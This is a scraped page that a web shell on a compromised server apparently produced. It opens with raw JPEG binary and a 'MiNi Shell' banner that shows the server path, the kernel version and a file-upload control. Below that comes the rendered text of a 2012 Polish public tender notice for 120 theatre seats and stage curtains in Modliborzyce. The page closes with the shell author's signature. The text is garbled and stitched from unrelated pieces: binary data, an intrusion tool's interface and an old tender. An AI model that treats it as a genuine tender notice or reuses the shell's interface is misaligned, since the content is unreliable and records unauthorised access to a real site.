JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121010/389888-N-2012.html

<p class="kh_header"><b>Modliborzyce: Dostawa i montaż foteli teatralno-kinowych oraz dostawa i montaż kompletnego okotarowania sceny wraz z elementami montażowymi w sali widowiskowej znajdującej się przy ul. Zamkowej 1 w Modliborzycach.</b><br>
<b>Numer ogłoszenia: 389888 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Kultury , ul. Zamkowa 1, 23-310 Modliborzyce, woj. lubelskie, tel. 15 871 50 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gokmodliborzyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż foteli teatralno-kinowych oraz dostawa i montaż kompletnego okotarowania sceny wraz z elementami montażowymi w sali widowiskowej znajdującej się przy ul. Zamkowej 1 w Modliborzycach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa oraz montaż 120 szt. foteli teatralno-kinowych wraz z wózkiem transportowym dla Gminnego Ośrodka Kultury w Modliborzycach, przy ulicy Zamkowej 1.                                                         
SPECYFIKACJA FOTELA:
Fotel teatralno -kinowy z systemem samoczynnego zamykania o wymiarach:
 szerokość fotela w osi podłokietników 510 mm - 560 mm,
wysokość fotela licząc od podłogi do szczytu oparcia 880 mm -960 mm,
głębokość fotela z rozłożonym siedziskiem 660 mm - 700 mm,
głębokość fotela ze złożonym siedziskiem 360 mm - 400 mm (nie licząc rozmiarów podstawy),
dopuszczalne obciążenie fotela - minimum 130 kg.
Siedzisko wykonane z pianki poliuretanowej profilowane z podparciem podkolanowym z grawitacyjnym mechanizmem samopowrotnym. Osłonka siedziska wykonana ze sklejki (np. bukowej) o gr. 10 mm - lakierowanej lakierem PU.
Oparcie  (preferowane półokrągłe) wykonane z pianki poliuretanowej, profilowane z podparciem lędźwiowym .Tył oparcia(osłonka) wykonana ze sklejki wielowarstwowej profilowanej (np. bukowej) w sposób zapewniający estetyczne połączenie z bokami fotela, o gr. 12mm - lakierowanej lakierem PU. Całość gwarantująca komfort siedzenia.
Metalowe konstrukcje nośne, sprężyny wzmacniające i inne mechanizmy zatopione w siedzisku i oparciu. Wszystkie elementy metalowe (np. nogi) malowane farbą proszkową.
Podłokietniki - pomiędzy fotelami musi znajdować się jeden podłokietnik. Podłokietnik nie może być podnoszony. Przestrzeń między podłokietnikiem a fotelem musi być zabudowana i tapicerowana materiałem, którym pokryty będzie fotel. Podłokietnik wykonany z litego twardego drewna (np. bukowego), lakierowanego lakierem PE.
Fotele tapicerowane tkaniną spełniającą wymagania intensywnego użytku komercyjnego 
(minimum 40 000 cykli metodą Martindalea), odporna na ścieranie i pilling, posiadającą wszelkie atesty niepalności. Materiał użyty do wyściełania foteli powinien być trwały i łatwo zmywalny (np. 100% poliester). Tkanina podlaminowana pianką barierową oraz siatką tzw. szermezą. Kolorystyka tapicerki , detali metalowych i wybarwienia elementów drewnianych   zostanie określona po przetargu przez Zamawiającego.
 Wszystkie fotele muszą być ponumerowane cyframi arabskimi (np.haft komputerowy) - środek górnej części oparcia. Dodatkowo skrajne fotele w rzędach posiadać muszą numer rzędu umieszczony na tapicerowanym boku fotela oznaczone cyframi rzymskim (np. haft komputerowy).
 Fotele wykonane jako wolnostojące bez montażu do podłoża w zestawach potrójnych. Nogi (podstawy) powinny zapewniać stabilność zarówno obciążonych, jak i pustych foteli. Planuje się zestawienie dziesięciu 12-miejscowych rzędów z przejściem pośrodku. Zestawy potrójne łączone po 2, za pomocą łatwego w montażu i demontażu łącznika. Nogi foteli wykończone miękkim materiałem, umożliwiającym ich przesuwanie bez ryzyka zarysowania drewnianej podłogi. Wraz z fotelami należy dostarczyć 1 szt. wózka do transportu, umożliwiającego łatwy transport potrójnych zestawów foteli. 
Ważne atesty: 
- trudnozapalności, nie wydzielania bardzo toksycznych produktów rozkładu i spalania w odniesieniu do materiałów z których wykonane są siedzenia, oparcia oraz elementy drewniane fotela, 
- atest badań wytrzymałościowych w zakresie bezpieczeństwa użytkowania
- atest higieniczny
- atest akustyczny. 
Wykonawca udzieli co najmniej 36 miesięcy gwarancji na dostarczone i zamontowane fotele. Zobowiązania gwarancyjne mają wynikać z zawartej umowy, bez dodatkowych dokumentów gwarancyjnych i będą realizowane na podstawie kserokopii faktur z załączonymi kserokopiami protokołu przekazania.
MONTAŻ
Fotele zostaną dostarczone i zamontowane przez wykonawcę własnym transportem i na własny koszt, w sposób zapewniający ich całość i nienaruszalność, na adres zamawiającego  w nieprzekraczalnym terminie do 28 listopada 2012.
Zamawiający dopuszcza rozwiązania równoważne opisywanym w SIWZ. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez zamawiającego.
Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami i normami oraz zasadami współczesnej wiedzy technicznej.
Wykonawca jest zobowiązany do bezpłatnej wymiany wadliwych materiałów na wolne od wad w terminie do 7 dni od momentu ich wykrycia.
Wykonawca do oferty winien załączyć :
- wzorcowy model oferowanego fotela zgodny z wymaganiami SIWZ
- próbki oferowanej tkaniny obiciowej (dostępna kolorystyka)
- próbnik zawierający co najmniej 8 kolorów wybarwień elementów drewnianych
- łącznik potrójnych zestawów
- atest klasyfikacja ogniowa w zakresie zapalności mebli tapicerskich wg normy PN-EN 1021-1:2007 oraz PN-EN 1021-2:2007 wydana przez akredytowane laboratorium badawcze dotyczące złożenia tapicerskiego oraz drewna bukowego
-atest klasyfikacja ogniowa w zakresie wydzielania toksycznych produktów spalania wg kryteriów normy PN/88/B/02855:1988 wydana przez akredytowane laboratorium badawcze dotyczące złożenia tapicerskiego oraz drewna bukowego
- atest higieniczny wydany przez Państwowy Zakład Higieny lub równoważne
-atest wytrzymałości i bezpieczeństwa użytkowania wg normy PN-EN 12727:2004 dla całego fotela
- atest wytrzymałości dla wózka do transportu foteli wg normy PN-EN 13150:2004, PN-M-78321:1998
- atest sprawozdanie z badań właściwości akustycznych dla foteli pustych i z publicznością. 

2. Przedmiotem zamówienia jest dostawa i montaż okotarowania sceny dla Gminnego Ośrodka Kultury w Modliborzycach, przy ul. Zamkowej 1.
Zakres dostawy obejmuje:
a) Kurtyna główna, rozsuwana, wykonana z materiału typu plusz - kolor do uzgodnienia z Inwestorem - o gramaturze ok. 360 g/m2, złożona z dwóch części, o wymiarach wysokość 5,10 m i szerokość łączna 7,60 m, po udrapowaniu. Marszczenie ok. 70 %. Materiał musi posiadać aktualne certyfikaty przeciwpożarowe. Boki kurtyny obszyte, u dołu kurtyny wykonana kieszeń do umieszczenia obciążenia. U góry kurtyny wszyty pas tapicerski, w pasie oczka tapicerskie, przez które montuje się kurtynę do wózków jezdnych istniejącego torowiska. Minięcie (zakładka) dwóch części kurtyny na środku torowiska powinno odbywać się na długości min. 30 cm. - 1 komplet,
b) Lambrekin do kurtyny wykonany z materiału typu plusz  o wymiarach wysokość 2,00 m i szerokość 7,60 m, po udrapowaniu. Marszczenie ok. 70%. U góry lambrekinu wszyty pas tapicerski. Boki i dół lambrekinu obszyte. Materiał musi posiadać aktualne certyfikaty przeciwpożarowe. Lambrekin zawiesić na sztywnej rurze (np. aluminiowej lub stalowej), którą należy zamocować do istniejącej konstrukcji - 1 szt.,
c) Rura o średnicy 30-50mm do zawieszenia lambrekinu - 1 szt.,
d) Horyzont tylny (dół) wykonany z materiału typu plusz o wymiarach wysokość 2,40 m i szerokość 7,50 m, uszyty na gładko. Horyzont, lekko marszczony, zawieszony np. na lince stalowej rozciągniętej między ścianami bocznymi sceny.  U góry horyzontu wszyty pas tapicerski. Boki horyzontu obszyte, u dołu wykonana kieszeń do umieszczenia obciążenia - 1 szt.,
e) Elementy do montażu horyzontu - 1 komplet,
f) Horyzont tylny (góra)  wykonany z materiału typu plusz o wymiarach wysokość 2,40 m i szerokość 7,50 m, uszyty na gładko, lekko marszczony przy montażu. Boki horyzontu obszyte, u dołu wykonana kieszeń do umieszczenia obciążenia. U góry horyzontu wszyty pas tapicerski, w pasie oczka tapicerskie, przez które montuje się horyzont do wózków jezdnych za pomocą karabińczyków. Wózki poruszają się po aluminiowym torowisku - 1 szt.,
g) Torowisko do górnej części horyzontu tylnego z  napędem ręcznym o długości 6,20 m mocowane do sufitu sceny. Szyna torowiska wykonana z aluminium. Wszystkie elementy obrotowe łożyskowane tocznie. Wózki kurtyny dwuosiowe, rolki powlekane poliamidem, łożyskowane tocznie, izolowane między sobą gumą (redukcja hałasu pochodzącego od zderzania się wózków) - 1 komplet,
h) Kulisy boczne wykonane z materiału typu plusz o wymiarach wysokość 4,30 m i szerokość 1,50 m. Uszyte na gładko i udrapowane przy zawieszaniu na uchwycie,
o szerokości 1,20 m. U góry kulisy wszyty pas tapicerski z trokami do zawieszenia na uchwycie kulisowym, boki kulisy obszyte, u dołu kulisy wykonana kieszeń do umieszczenia obciążenia - 6 szt.,
i) Obrotowe uchwyty do kulis o szer. 1,20 m - 6 szt.,
j) Paludamenty wykonane z materiału typu plusz o wymiarach wysokość 0,65 m i szerokość 7,50 m, uszyte na gładko, lekko marszczone przy montażu. Paludamenty zawieszone np. za pomocą linki stalowej, rozciągniętej między ścianami bocznymi sceny. U góry paludamentu wszyty pas tapicerski z trokami do zawieszenia. Boki i dół paludamentu obszyte - 3 szt.,
k) Elementy do montażu paludamentów - 3 komplety,
l) Zasłona na drzwi przy scenie wykonana z materiału typu plusz o wymiarach wysokość 2,20 m i szerokość 1,20 m, po udrapowaniu. Marszczenie ok. 70%. Zasłonki zawieszone np. na karniszu. U góry horyzontu wszyty pas tapicerski i taśma do której zaczepia się tzw.agrafki lub żabki i za ich pośrednictwem zawiesza się zasłonki na karniszu. Boki zasłonek obszyte, u dołu  wykonana kieszeń do umieszczenia obciążenia - 1 szt.,
ł) Karnisz do zasłonki na drzwi o szerokości 1,20 m - 1 komplet.
Zamawiający posiada torowisko z napędem elektrycznym do kurtyny głównej oraz 3 wysięgniki przystosowane do montażu na nich rury z lambrekinem.
Wymagany materiał okotarowania - plusz dekoracyjny o gramaturze ok. 360 g/m2 .
Kolorystyka elementów okotarowania zostanie określona po przetargu przez Zamawiającego.
Wszystkie materiały użyte do realizacji w/w zamówienia winny posiadać właściwe atesty, aprobaty techniczne lub świadectwa zgodności oraz aktualne certyfikaty niepalności dopuszczające do stosowania w tego typu obiektach - dostarczone z ofertą.
Okotarowanie zostanie dostarczone i zamontowane przez wykonawcę własnym transportem i na własny koszt, w sposób zapewniający ich całość i nienaruszalność, na adres zamawiającego  w nieprzekraczalnym terminie do 28 listopada 2012.
Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami i normami oraz zasadami współczesnej wiedzy technicznej.
Wykonawca jest zobowiązany do bezpłatnej wymiany wadliwych materiałów na wolne od wad w terminie do 7 dni od momentu ich wykrycia.
Wykonawca dostarczy instrukcje obsługi i konserwacji przedmiotu zamówienia.
Wykonawca do oferty winien załączyć :
- próbki oferowanych tkanin (dostępna kolorystyka i wzornictwo)
- właściwe atesty. 
Wykonawca powinien dokonać oględzin miejsca, w którym przedmiot zamówienia ma być zamontowany, celem sprawdzenia warunków montażu kurtyny oraz dokonać własnych pomiarów okotarowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.11.12.00-5, 19.20.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą się ubiegać Wykonawcy, którzy spełniają łącznie warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy, tj:	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia. Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna: wykonanie w okresie 3  ostatnich lat (a jeżeli okres prowadzenia przez Wykonawcę działalności jest krótszy, to w tym okresie) przed dniem wszczęcia postępowania, co najmniej 3 (trzech) dostaw odpowiadających przedmiotowi i  wartości niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują potencjałem technicznym do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
W przypadku Wykonawców  wspólnie ubiegających się o wykonanie zamówienia  Zamawiający wymaga, aby przynajmniej jeden z Wykonawców ( lub wspólnie) spełniał/li  w/wym. wymagania. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. 
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty. Ocena spełniania warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy w/w dokumentów metodą: spełnia - nie spełnia. Oznacza to, że wystarczającym powodem do wykluczenia wykonawcy może być brak w ofercie któregokolwiek z wymaganych, wymienionych w § 9 i 10 dokumentów lub ich nie uzupełnienie, we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.07.223.1655 oraz Dz.U.08.171.1058).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Cena - 70</li>
<li>3 - Ocena funkcjonalności, komfortu, estetyki i jakości oferowanych materiałów - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gokmodliborzyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Kultury
ul. Zamkowa 1
23-310 Modliborzyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2012 godzina 12:00, miejsce: Gminny Ośrodek Kultury
ul. Zamkowa 1
23-310 Modliborzyce
I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dotowany ze środków Ministra Kultury i Dziedzictwa Narodowego: Rozwój infrastruktury kultury, priorytet: Infrastruktura domów kultury..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com